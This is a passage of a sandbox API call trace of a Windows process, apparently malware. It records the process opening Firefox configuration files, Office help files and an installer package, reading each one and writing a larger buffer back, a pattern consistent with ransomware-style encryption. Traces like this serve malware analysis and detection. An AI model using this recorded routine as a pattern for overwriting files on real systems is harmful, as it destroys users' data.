lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.435] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x9863e [0133.435] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.435] ReleaseMutex (hMutex=0x168) returned 1 [0133.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.dic", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0133.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.dic", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-US.dic", lpUsedDefaultChar=0x0) returned 9 [0133.436] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0133.438] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0133.439] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9763e [0133.439] ReadFile (in: hFile=0x208, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0133.443] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9763e [0133.444] WriteFile (in: hFile=0x208, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0133.444] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0133.444] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0133.444] WriteFile (in: hFile=0x208, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0133.444] CloseHandle (hObject=0x208) returned 1 [0133.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.446] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.446] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8c [0133.447] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.447] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.447] ReleaseMutex (hMutex=0x168) returned 1 [0133.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="platform.ini", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0133.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="platform.ini", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="platform.ini", lpUsedDefaultChar=0x0) returned 12 [0133.447] ReadFile (in: hFile=0x208, lpBuffer=0x2673898, nNumberOfBytesToRead=0x8c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x345f2bc*=0x8c, lpOverlapped=0x0) returned 1 [0133.448] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.448] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x614, lpOverlapped=0x0) returned 1 [0133.448] CloseHandle (hObject=0x208) returned 1 [0133.448] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.450] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.450] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x89 [0133.450] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.450] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.450] ReleaseMutex (hMutex=0x168) returned 1 [0133.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update-settings.ini", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0133.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="update-settings.ini", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="update-settings.ini", lpUsedDefaultChar=0x0) returned 19 [0133.450] ReadFile (in: hFile=0x208, lpBuffer=0x2673898, nNumberOfBytesToRead=0x89, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673898*, lpNumberOfBytesRead=0x345f2bc*=0x89, lpOverlapped=0x0) returned 1 [0133.451] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.451] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x611, lpOverlapped=0x0) returned 1 [0133.451] CloseHandle (hObject=0x208) returned 1 [0133.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\trillian.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\trillian.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0133.452] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\trillian.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Mozilla Maintenance Service\\trillian.exe", lpFilePart=0x345f690*="trillian.exe") returned 0x3f [0133.452] GetLastError () returned 0x20 [0133.452] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x51 [0133.452] LocalFree (hMem=0x696c00) returned 0x0 [0133.452] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0133.452] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0133.453] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.453] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.453] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\trillian.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\trillian.exe")) returned 0x20 [0133.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\filezilla.exe" (normalized: "c:\\program files (x86)\\uninstall information\\filezilla.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0133.454] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Uninstall Information\\filezilla.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Uninstall Information\\filezilla.exe", lpFilePart=0x345f690*="filezilla.exe") returned 0x3a [0133.454] GetLastError () returned 0x20 [0133.454] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x51 [0133.454] LocalFree (hMem=0x696c00) returned 0x0 [0133.454] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0133.454] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0133.454] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.454] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.454] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\filezilla.exe" (normalized: "c:\\program files (x86)\\uninstall information\\filezilla.exe")) returned 0x20 [0133.455] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0133.456] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", lpFilePart=0x345f690*="ImagingDevices.exe.mui") returned 0x48 [0133.456] GetLastError () returned 0x5 [0133.456] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0133.456] LocalFree (hMem=0x69e2b0) returned 0x0 [0133.456] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0133.456] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0133.457] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.457] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.457] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui")) returned 0x20 [0133.457] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\fling.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\fling.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0133.457] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\fling.exe", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Portable Devices\\fling.exe", lpFilePart=0x345f690*="fling.exe") returned 0x39 [0133.458] GetLastError () returned 0x20 [0133.458] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x51 [0133.458] LocalFree (hMem=0x696c00) returned 0x0 [0133.458] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0133.458] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0133.458] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.458] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0133.458] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\fling.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\fling.exe")) returned 0x20 [0133.458] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.461] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.461] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x146 [0133.461] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.461] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.461] ReleaseMutex (hMutex=0x168) returned 1 [0133.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0133.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0133.461] ReadFile (in: hFile=0x208, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x345f2bc*=0x146, lpOverlapped=0x0) returned 1 [0133.462] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.462] WriteFile (in: hFile=0x208, lpBuffer=0x1e943c8*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesWritten=0x345f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0133.463] CloseHandle (hObject=0x208) returned 1 [0133.463] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0133.464] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.464] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x146 [0133.465] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0133.465] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0133.465] ReleaseMutex (hMutex=0x168) returned 1 [0133.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0133.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSOUC.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0133.465] ReadFile (in: hFile=0x208, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x345f2bc*=0x146, lpOverlapped=0x0) returned 1 [0133.466] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0133.466] WriteFile (in: hFile=0x208, lpBuffer=0x1e943c8*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesWritten=0x345f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0133.466] CloseHandle (hObject=0x208) returned 1 [0133.466] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0135.902] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.902] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x158 [0135.902] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.903] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.903] ReleaseMutex (hMutex=0x168) returned 1 [0135.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88bcc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0135.903] ReadFile (in: hFile=0x204, lpBuffer=0x26a7768, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a7768*, lpNumberOfBytesRead=0x345f2bc*=0x158, lpOverlapped=0x0) returned 1 [0135.904] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0135.904] WriteFile (in: hFile=0x204, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x345f2d0*=0x6e0, lpOverlapped=0x0) returned 1 [0135.904] CloseHandle (hObject=0x204) returned 1 [0135.905] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0135.906] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.906] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x152 [0135.907] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.907] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.907] ReleaseMutex (hMutex=0x168) returned 1 [0135.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0135.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0135.907] ReadFile (in: hFile=0x204, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x345f2bc*=0x152, lpOverlapped=0x0) returned 1 [0135.908] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0135.908] WriteFile (in: hFile=0x204, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6da, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x345f2d0*=0x6da, lpOverlapped=0x0) returned 1 [0135.908] CloseHandle (hObject=0x204) returned 1 [0135.909] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0135.924] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.925] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x23000 [0135.925] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0135.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.925] ReleaseMutex (hMutex=0x168) returned 1 [0135.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0135.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0135.925] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, 